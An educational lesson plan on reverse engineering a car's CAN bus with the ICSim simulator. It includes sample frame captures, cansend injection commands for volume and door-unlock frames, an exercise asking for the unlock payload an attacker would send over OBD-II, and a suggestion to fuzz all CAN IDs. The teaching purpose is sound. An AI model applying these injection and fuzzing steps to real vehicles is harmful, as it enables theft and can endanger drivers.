Car Hacking 101: Reverse Engineering the CAN Bus
Automotive Cybersecurity Pathway
1. Materials & Setup
Hardware & Software Requirements:
- Computer: Windows, macOS, or Linux (64-bit CPU, minimum 8GB RAM).
- Virtualization (Highly Recommended): VirtualBox or VMware running Kali Linux or Ubuntu LTS.
- Software Tools (Free/Open Source):
can-utils(Linux native CAN network debugging tools).ICSim(Instrument Cluster Simulator by Craig Smith) — a virtual car dashboard for safe hacking.
- Offline/Analogue Alternative: If you cannot run a Linux VM today, a paper-and-pencil CAN frame analysis sheet is provided in the "We Do" section.
2. Learning Objectives & Success Criteria
| What You Will Learn (Objectives) | How You Will Prove It (Success Criteria) |
|---|---|
|
|
3. Introduction: The Jeep Cherokee Incident
Imagine this scenario...
In 2015, security researchers Charlie Miller and Chris Valasek sat on a couch miles away from a highway. Using only their laptops, they connected remotely to a Jeep Cherokee driving at 70 mph. They bypassed the infotainment system, hopped onto the vehicle's internal network, and proceeded to turn the air conditioning to full blast, blast hip-hop from the radio, activate the windshield wipers, and eventually, kill the transmission in the middle of traffic.
How did they do this? They exploited the fundamental nervous system of the modern vehicle: the CAN Bus. Modern cars are not just mechanical machines; they are localized networks of up to 100 mini-computers called Electronic Control Units (ECUs). Today, we are going to learn how to speak their language, intercept their messages, and understand how to secure them.
4. Deep Dive & Practice
The CAN Bus protocol was designed in 1983 by Bosch. At the time, cars were closed systems with no cellular connections, no Bluetooth, and no Wi-Fi. It was designed to be fast, cheap, and highly reliable. Because of this, it has three massive security flaws:
- No Encryption: All commands are sent in cleartext hexadecimal format.
- No Authentication: There are no digital signatures. A brake controller cannot verify if a "stop" command came from the brake pedal or a rogue infotainment system. It trusts everything.
- Broadcast Network: Every ECU hears every single message sent on the bus, regardless of whether it needs to.
Anatomy of a CAN Frame (The Packet)
A standard CAN message looks like this on the wire:
1A3 # 8 [ 00 FF 2C 00 00 00 05 AA ]
- CAN ID (Arbitration ID):
1A3(Hexadecimal). This acts as the address and the priority indicator. Lower IDs have higher priority on the network. In this vehicle, ID1A3might represent the "Steering Wheel Controls." - DLC (Data Length Code):
8. This indicates how many bytes of data are following (maximum of 8 bytes for standard CAN). - Data Payload:
00 FF 2C 00 00 00 05 AA. These 8 hex pairs are the actual values. Byte 3 (2C) could represent the steering wheel angle, while Byte 7 (AA) might indicate if the horn button is pressed.
Let's work together to isolate a specific action from a stream of network noise. Imagine you are sniffing a car's network while the driver is pressing the volume buttons on the steering wheel. We want to find which CAN ID controls the volume, and what the exact "Volume Up" payload is.
Look at the captured packets below. What patterns do you notice changing when actions occur?
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 00 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER PRESSES "VOLUME UP"]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 01 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER RELEASES BUTTON]
2C4 # 4 [ 1A BB 00 00 ]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
[USER PRESSES "VOLUME DOWN"]
0A1 # 8 [ 00 00 12 F0 45 00 00 00 ]
2C4 # 4 [ 1A BB 02 00 ]
2C4 # 4 [ 1A BB 02 00 ]
Step-by-Step Analysis:
- Identify the changing ID: Notice that ID
0A1never changes its payload (always00 00 12 F0 45 00 00 00). ID2C4is the one showing modifications when actions occur. Therefore,2C4controls the volume controls. - Isolate the variable byte: Look at
2C4when volume is idle (1A BB 00 00), vs volume up (1A BB 01 00), vs volume down (1A BB 02 00). Byte index 2 (the 3rd byte) is changing! - Formulate the exploit command: If we wanted to forcefully simulate a "Volume Up" command, we would need to continuously transmit:
cansend vcan0 2C4#1ABB0100
Choose the track that fits your current setup today:
Option A: Interactive Software Simulation (If you have Linux VM ready)
- Open your terminal and create a virtual CAN network device:
sudo modprobe vcan sudo ip link add dev vcan0 type vcan sudo ip link set up vcan0 - Clone and compile
ICSimfrom Github (or run your pre-installed package). - Launch the simulator window (the car cluster) and the controller window (your joystick pad).
- Open a second terminal window and run:
cansniffer vcan0 -c(this color-codes bytes that change in real-time). - While watching the sniffer, press the lock button on the controller. Find the packet ID that flashes.
- Use the terminal to inject your own command to unlock the virtual doors! Type:
cansend vcan0 [ID]#[PAYLOAD]
Option B: Analytical Reverse-Engineering Case Study
Analyze this raw, captured packet stream of a car while the driver uses the key fob to lock/unlock the driver's door. Your goal is to write down the exact command payload that a hacker would broadcast onto the OBD-II port to unlock the vehicle door.
[09:00:01] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
[09:00:02] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
[09:00:03] 3A9 # 5 [ 00 00 FF 11 00 ] (Status Query)
[09:00:04] 1E5 # 8 [ 04 22 88 01 F0 FF A1 12 ] (Fob Button Pressed: "LOCK")
[09:00:05] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
[09:00:06] 1E5 # 8 [ 04 22 88 02 F0 FF B2 12 ] (Fob Button Pressed: "UNLOCK")
[09:00:07] 1E5 # 8 [ 04 22 00 00 F0 FF 00 12 ] (Idle Status)
Your Analysis Task:
- Which Arbitration ID controls the lock mechanism?
- Which Byte Index contains the operational trigger?
- What is the exact 16-hex-character payload required to execute an UNLOCK command?
5. Assessment & Check for Understanding
Self-Check Concept Questions:
Q1: Why doesn't the target ECU block a command from an attacker's computer plugged into the OBD-II port?
View Answer
Because the CAN bus protocol lacks authentication. It treats every message as trusted and valid, regardless of its source.
Q2: If an ID 0x005 and an ID 0x1E5 try to send a packet at the exact same millisecond, which packet goes first?
View Answer
ID 0x005 wins. On a CAN bus, lower numerical Arbitration IDs have higher priority over the bus and preempt other traffic.
Summative Challenge: Security Architecture Briefing
Draft a 1-page "Threat Intelligence Report" or record a 3-minute voice memo answering the following questions for a car manufacturer:
- Explain step-by-step how you were able to bypass the vehicle defenses (virtually) to gain entry.
- Identify what mitigation techniques should be designed into next-generation cars to prevent this. (Hint: Think about CAN-FD, Gateway firewalls, or Secure Hardware Extension modules).
6. Differentiation & Extension Options
For Extra Guidance (Scaffolding):
If hexadecimal math is hard to read: Think of hexadecimal values as a scale of 0 to 255 in standard numbers.
00 means completely off (0%). FF means completely on (100%).
7F is roughly half (50%).
For Advanced Learners (Extension):
Python automation challenge: Use the python-can library to write an automated script that scans IDs 0x000 to 0x7FF, fuzzing each with variable payloads to find undocumented diagnostic commands (UDS - Unified Diagnostic Services).